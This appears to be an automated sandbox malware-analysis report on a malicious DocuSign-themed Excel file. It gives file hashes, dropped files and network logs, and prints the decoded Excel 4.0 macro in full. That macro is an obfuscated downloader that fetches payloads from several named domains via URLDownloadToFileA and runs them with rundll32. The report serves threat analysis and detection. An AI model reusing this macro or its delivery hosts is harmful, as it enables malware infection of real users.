                                                                                                                                                              SHA1:2B800C89A49BC9350111253876EC2207E5F05C40
                                                                                                                                                              SHA-256:ACE10380E4ADD30EE3A6E89F4FB392706DF2DA520CA727D261DEEE32E940D09E
                                                                                                                                                              SHA-512:82B35BB4A686171E02FA6041F4E4F888A35D74DDCABC0992A4F2DC294A6471F5DF3F70AEDCB1744A0CF8942F90E0DA15C2A46B9CFD554E4B81A8B7427833DA83
                                                                                                                                                              Malicious:true
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: L..................F.... ....f-.:......].......].................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WRU7....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.WRU7.....S....................sb..h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny.WRU7.....Y..............>.......+.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..>..WR[7 .COMPLA~1.XLS..t......>QwxWR[7....h........................C.o.m.p.l.a.i.n.t.-.1.0.9.1.1.9.1.3.2.0.-.0.2.1.8.2.0.2.1...x.l.s.......g...............-.......f...........>.S......C:\Users\user\Desktop\Complaint-1091191320-02182021.xls..8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t.-.1.0.9.1.1.9.1.3.2.0.-.0.2.1.8.2.0.2.1...x.l.s.........:..,.LB.)...As...`.......X.......835180...........!a..%.H.VZAj...i..-.........-..!a..%.H.VZAj...i..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1
                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Tue Feb 23 05:59:01 2021, atime=Tue Feb 23 05:59:01 2021, length=12288, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):904
                                                                                                                                                              Entropy (8bit):4.6354351062955175
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:8dMXUIXcuElPCH2YgKXbSYEu8q+WrjAZ/2bDiDLC5Lu4t2Y+xIBjKZm:8dgjggnAZiDh87aB6m
                                                                                                                                                              MD5:166929E380ED9B7306A5E7AF894C844E
                                                                                                                                                              SHA1:278BF0353BBB6D0CCD388061EDECF081635C2BAE
                                                                                                                                                              SHA-256:15612116E356DA23C7867712598DDEEC7569D931D5FD730EB84550A862D2B01E
                                                                                                                                                              SHA-512:EB0A57AA38F47FBFCF7A3D7605764FDB30E5E5260A49AE0E73E0F146E613EBE5944B83272CF0CDC69C91D1102C2350E825AF2CF761F964E98D1DB9E3180381BA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: L..................F........N....-.....]......].....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WRU7....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.WRU7.....S....................sb..h.a.r.d.z.....~.1.....WRa7..Desktop.h.......Ny.WRa7.....Y..............>.....=j<.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......835180...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):152
                                                                                                                                                              Entropy (8bit):4.562582694363095
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:oyBVomMYlIMbGXEFXa+1lIMbGXEFXamMYlIMbGXEFXav:dj6YloEFtloEFMYloEFU
                                                                                                                                                              MD5:D06751BF66E09257B6EFE179C1F6EEBE
                                                                                                                                                              SHA1:6814C3DA0B6C8BCC2DAF9C6FBF4A280B8C81A513
                                                                                                                                                              SHA-256:C08803BC05F67C1CC9F96207D81818E773052D28DCAD715BC00586FEA2C3D912
                                                                                                                                                              SHA-512:A038A62B567B9C348E767B51CFB8C8C97501F4028EA90379153BBFB266C3AE4CA5EF6C2BF890F8E34AFE013E05C0BCF1A0384AF860F620EB247617023AF7B525
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: Desktop.LNK=0..[xls]..Complaint-1091191320-02182021.xls.LNK=0..Complaint-1091191320-02182021.xls.LNK=0..[xls]..Complaint-1091191320-02182021.xls.LNK=0..
                                                                                                                                                              C:\Users\user\Desktop\24910000
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):112212
                                                                                                                                                              Entropy (8bit):6.596875465281777
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:L/8rmOAIyyzElBIL6lECbgBGzP5xLm7TdKwRWEBE/sRcEBE/vkEBE/Ky/8rmOAIf:L8rmOAIyyzElBIL6lECbgB+P5Nm7TdKZ
                                                                                                                                                              MD5:A1209AE4245AFA2C3723727363A42545
                                                                                                                                                              SHA1:4BF8BB135EBB67CC7E7B41A60CED57AAF6542025
                                                                                                                                                              SHA-256:7178D3AF24D571E93019603BBFC01C1DF08D87628C8620247EFACFB8BD87E7B2
                                                                                                                                                              SHA-512:B9EBF28218764629E24FE8C42F47C1943B4A19C5A86E894F07650E9D783BBA6A3E3B1F34008416293E87DF99837B2473A9A440407678ED27DA9BF08E2A487BFC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: ........T8..........................\.p....pratesh B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1................p..C.a.l.i.b.r.i.1................p..C.a.l.i.b.r.i.1................p..C.a.l.i.b.r.i.1................p..C.a.l.i.b.r.i.1................p..C.a.l.i.b.r.i.1...,...8........p..C.a.l.i.b.r.i.1.......8........p..C.a.l.i.b.r.i.1.......8........p..C.a.l.i.b.r.i.1...h...8........p..C.a.m.b.r.i.a.1.......4........p..C.a.l.i.b.r.i.1................p..C.a.l.i.b.r.i.1................p..C.a.l.i.b.r.i.1................p..C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.............
                                                                                                                                                              C:\Users\user\JDFR.hdfgr1
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):678
                                                                                                                                                              Entropy (8bit):5.285274611226955
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:qTWgr2dzLtGc8NZAPvzLUIp1Y2vWMA78h2vu9ZQhUytSAzYNPvK6wcYKpGu:0Wxdz8LkHzA2Y2vW+h2vunQr1CK6Tz
                                                                                                                                                              MD5:1C7833DA48979334A611F80C7C55F5E6
                                                                                                                                                              SHA1:B302B4245452489C6241CE4358BD1F07BA4A6767
                                                                                                                                                              SHA-256:D0D92045526C516AFEC269826EB681EF55DF6353DD9D131BC58A1B19042B7C6C
                                                                                                                                                              SHA-512:512D0ED4A7BD2BA867C96AF87F114B343FD821A3C826B7F04272AFE40CE218294E893D49167932248DD9297A423B2DC354F07659F979416433DB7F62AF6B0C5C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: <!doctype html>..<html>..<head>..<meta charset="utf-8">..<title>Suspend !</title>..<link href="http://suspend.pars.host/css/css.css" rel="stylesheet" type="text/css">..</head>....<body>..<div class="main">..<center><a style="" href="http://pars.host"><img src="http://suspend.pars.host/image/logo.png" /></a></center>..<p align="center">..... ..... .. ...... ..... ... ...<br>........ .... ...... ... ..... ..... . .... .... ... .......<br>....... .. .... <a style="" href="http://pars.host">.... ....</a> .... .... .........<br><br>..</div>....</p>..</body>..</html>..

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 13:41:44 2021, Security: 0
                                                                                                                                                              Entropy (8bit):3.7019861909873857
                                                                                                                                                              TrID:
                                                                                                                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                              File name:Complaint-1091191320-02182021.xls
                                                                                                                                                              File size:146944
                                                                                                                                                              MD5:da47abb08bf5ab8ccd6dde8b8395585d
                                                                                                                                                              SHA1:f4ffc845ceb85dee839ac85228ff410d9a01bd33
                                                                                                                                                              SHA256:91b4e89cdfe2e0d0f29642b21d4035ee4201f99e24e5ec841d4c8bb73547cd78
                                                                                                                                                              SHA512:1215c59e61129a34d96e0f1c574727c18c24517912e087f82defb18d02bad6910f9cc5dffe78f435fabf440c67ca1f6a567e55c496c4b7caca7f4a42234361d5
                                                                                                                                                              SSDEEP:3072:2cPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMht/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/f:2cPiTQAVW/89BQnmlcGvgZ7r3J8YUOM6
                                                                                                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                              Static OLE Info

                                                                                                                                                              General

                                                                                                                                                              Document Type:OLE
                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                              OLE File "Complaint-1091191320-02182021.xls"

                                                                                                                                                              Indicators

                                                                                                                                                              Has Summary Info:True
                                                                                                                                                              Application Name:Microsoft Excel
                                                                                                                                                              Encrypted Document:False
                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                              Contains Workbook/Book Stream:True
                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                              Flash Objects Count:
                                                                                                                                                              Contains VBA Macros:True

                                                                                                                                                              Summary

                                                                                                                                                              Code Page:1251
                                                                                                                                                              Author:
                                                                                                                                                              Last Saved By:Friner
                                                                                                                                                              Create Time:2006-09-16 00:00:00
                                                                                                                                                              Last Saved Time:2021-02-18 13:41:44
                                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                                              Security:0

                                                                                                                                                              Document Summary

                                                                                                                                                              Document Code Page:1251
                                                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                                                              Contains Dirty Links:False

                                                                                                                                                              Streams

                                                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:4096
                                                                                                                                                              Entropy:0.327349318268
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                                                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:4096
                                                                                                                                                              Entropy:0.265824820061
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                              Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135983
                                                                                                                                                              General
                                                                                                                                                              Stream Path:Book
                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                              Stream Size:135983
                                                                                                                                                              Entropy:3.7011413863
                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                              Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . .
                                                                                                                                                              Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                              Macro 4.0 Code

                                                                                                                                                              ,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",dindorf.com.ar/ntpnttfypqs/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",7ruzezendegi.com/samsgtlfwzt/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",miaovideo.com/wwdtfgdlijlr/ ,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",batikentklinik.com/qtuofsxtov/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",chandni.pk/ictrljsfuh/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,
                                                                                                                                                              ,,,,,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,,=HALT(),,,,,,,,,,,,,,

                                                                                                                                                              Network Behavior

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Feb 22, 2021 22:59:02.957930088 CET4971080192.168.2.3181.88.192.136
                                                                                                                                                              Feb 22, 2021 22:59:03.224803925 CET8049710181.88.192.136192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:03.224912882 CET4971080192.168.2.3181.88.192.136
                                                                                                                                                              Feb 22, 2021 22:59:03.225424051 CET4971080192.168.2.3181.88.192.136
                                                                                                                                                              Feb 22, 2021 22:59:03.492402077 CET8049710181.88.192.136192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:04.631943941 CET8049710181.88.192.136192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:04.633408070 CET4971080192.168.2.3181.88.192.136
                                                                                                                                                              Feb 22, 2021 22:59:04.839406013 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 22:59:04.980715990 CET8049713185.159.153.72192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:04.981409073 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 22:59:04.982100964 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 22:59:05.122184992 CET8049713185.159.153.72192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:05.122201920 CET8049713185.159.153.72192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:05.122610092 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 22:59:05.124562979 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 22:59:05.286747932 CET8049713185.159.153.72192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:05.286768913 CET8049713185.159.153.72192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:05.286874056 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 22:59:05.286885023 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 22:59:05.287875891 CET8049713185.159.153.72192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:05.289465904 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 22:59:05.628535986 CET4971580192.168.2.3112.125.131.128
                                                                                                                                                              Feb 22, 2021 22:59:08.631552935 CET4971580192.168.2.3112.125.131.128
                                                                                                                                                              Feb 22, 2021 22:59:10.292977095 CET8049713185.159.153.72192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:10.293052912 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 22:59:14.632397890 CET4971580192.168.2.3112.125.131.128
                                                                                                                                                              Feb 22, 2021 23:00:49.346362114 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 23:00:49.347209930 CET4971080192.168.2.3181.88.192.136
                                                                                                                                                              Feb 22, 2021 23:00:49.612814903 CET8049710181.88.192.136192.168.2.3
                                                                                                                                                              Feb 22, 2021 23:00:49.613810062 CET4971080192.168.2.3181.88.192.136
                                                                                                                                                              Feb 22, 2021 23:00:49.721107006 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 23:00:50.377530098 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 23:00:51.705677032 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 23:00:54.330791950 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 23:00:59.582401037 CET4971380192.168.2.3185.159.153.72
                                                                                                                                                              Feb 22, 2021 23:01:10.082379103 CET4971380192.168.2.3185.159.153.72

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Feb 22, 2021 22:58:46.199289083 CET5677753192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:46.249793053 CET53567778.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:46.323472023 CET5864353192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:46.373271942 CET53586438.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:46.376547098 CET6098553192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:46.424992085 CET53609858.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:46.637113094 CET5020053192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:46.687289000 CET53502008.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:47.437449932 CET5128153192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:47.492053986 CET53512818.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:48.636333942 CET4919953192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:48.687866926 CET53491998.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:49.402770042 CET5062053192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:49.462667942 CET53506208.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:49.782305956 CET6493853192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:49.843559027 CET53649388.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:51.356633902 CET6015253192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:51.421510935 CET53601528.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:52.250014067 CET5754453192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:52.298525095 CET53575448.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:53.286185026 CET5598453192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:53.337589025 CET53559848.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:58.402293921 CET6418553192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:58.451045036 CET53641858.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:59.399849892 CET6511053192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:59.463658094 CET53651108.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:59.536993980 CET5836153192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:59.585489035 CET53583618.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:58:59.901577950 CET6349253192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:58:59.961525917 CET53634928.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:00.916085005 CET6349253192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:00.964624882 CET53634928.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:01.930468082 CET6349253192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:01.988574982 CET53634928.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:02.776334047 CET6083153192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:02.956057072 CET53608318.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:02.963412046 CET6010053192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:03.013993979 CET53601008.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:03.769742966 CET5319553192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:03.833102942 CET53531958.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:03.943865061 CET6349253192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:04.002682924 CET53634928.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:04.648597002 CET5014153192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:04.837488890 CET53501418.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:04.960216999 CET5302353192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:05.010452032 CET53530238.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:05.311264992 CET4956353192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:05.626641989 CET53495638.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:06.072643995 CET5135253192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:06.125664949 CET53513528.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:06.880871058 CET5934953192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:06.929631948 CET53593498.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:07.641009092 CET5708453192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:07.697993994 CET53570848.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:07.959760904 CET6349253192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:08.031663895 CET53634928.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:09.222551107 CET5882353192.168.2.38.8.8.8
